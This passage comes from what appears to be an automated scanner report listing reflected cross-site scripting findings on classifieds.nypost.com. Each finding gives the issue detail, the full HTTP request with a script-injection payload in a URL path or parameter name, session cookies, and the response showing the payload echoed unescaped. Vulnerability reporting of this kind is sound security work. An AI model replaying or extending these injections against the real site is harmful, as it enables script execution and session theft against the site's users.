cmCreatePageviewTag("info privacy/?1bb31"-alert(1)-"eaa692a63db=1","10000017","","","ny-_-info-_-info-_-nypost USA-_-nypost-_-USA-_-nypost-_-info-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.97. http://www.classifieds.nypost.com/info/safety/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/safety/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b48"><script>alert(1)</script>09070aae295 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info88b48"><script>alert(1)</script>09070aae295/safety/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5OTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/info88b48"><script>alert(1)</script>09070aae295/safety/" />
...[SNIP]...

1.98. http://www.classifieds.nypost.com/info/safety/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/safety/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86b8f"-alert(1)-"6f8a308ae1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /info86b8f"-alert(1)-"6f8a308ae1/safety/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:25:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds info86b8f"-alert(1)-"6f8a308ae1/safety/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.99. http://www.classifieds.nypost.com/info/safety/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/safety/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc634"><script>alert(1)</script>febe38143e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info/safety/?cc634"><script>alert(1)</script>febe38143e2=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/info/safety/?cc634"><script>alert(1)</script>febe38143e2=1" />
...[SNIP]...

1.100. http://www.classifieds.nypost.com/info/safety/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/safety/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f01e"-alert(1)-"2f9eda3b7a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /info/safety/?8f01e"-alert(1)-"2f9eda3b7a1=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5OTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
-_-nypost-_-info-_--_--_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-info-_-info-_--_-nypost-_-USA-_-nypost-_-info-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreatePageviewTag("info safety/?8f01e"-alert(1)-"2f9eda3b7a1=1","10000017","","","ny-_-info-_-info-_-nypost USA-_-nypost-_-USA-_-nypost-_-info-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.101. http://www.classifieds.nypost.com/info/terms/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/terms/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ffbb"><script>alert(1)</script>6d47608e417 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info9ffbb"><script>alert(1)</script>6d47608e417/terms/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:25:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/info9ffbb"><script>alert(1)</script>6d47608e417/terms/" />
...[SNIP]...

1.102. http://www.classifieds.nypost.com/info/terms/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/terms/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9588"-alert(1)-"65e27638775 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /infob9588"-alert(1)-"65e27638775/terms/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:25:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds infob9588"-alert(1)-"65e27638775/terms/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.103. http://www.classifieds.nypost.com/info/terms/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/terms/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8489a"-alert(1)-"278be8544e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /info/terms/?8489a"-alert(1)-"278be8544e7=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:25:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
A-_-nypost-_-info-_--_--_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-info-_-info-_--_-nypost-_-USA-_-nypost-_-info-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreatePageviewTag("info terms/?8489a"-alert(1)-"278be8544e7=1","10000017","","","ny-_-info-_-info-_-nypost USA-_-nypost-_-USA-_-nypost-_-info-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.104. http://www.classifieds.nypost.com/info/terms/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/terms/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7481b"><script>alert(1)</script>6b562b3adf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info/terms/?7481b"><script>alert(1)</script>6b562b3adf8=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:25:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/info/terms/?7481b"><script>alert(1)</script>6b562b3adf8=1" />
...[SNIP]...

1.105. http://www.classifieds.nypost.com/job/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /job/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95829"-alert(1)-"fccefdfad6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /job95829"-alert(1)-"fccefdfad6d/ HTTP/1.1
Host: www.classifieds.nypost.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=3ba3b7OvjvD-WrLvxgh; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:21:33 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=55c90344576e14be8dc5585a4805b2a0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=b1044dc84aedcbd19e91b822fa4212a0; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1DMDRBRkRENTRDRjAxNkNE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds job95829"-alert(1)-"fccefdfad6d/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.106. http://www.classifieds.nypost.com/job/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /job/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e558c"><script>alert(1)</script>30e5e0450f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jobe558c"><script>alert(1)</script>30e5e0450f6/ HTTP/1.1
Host: www.classifieds.nypost.com
Proxy-Connection: keep-alive
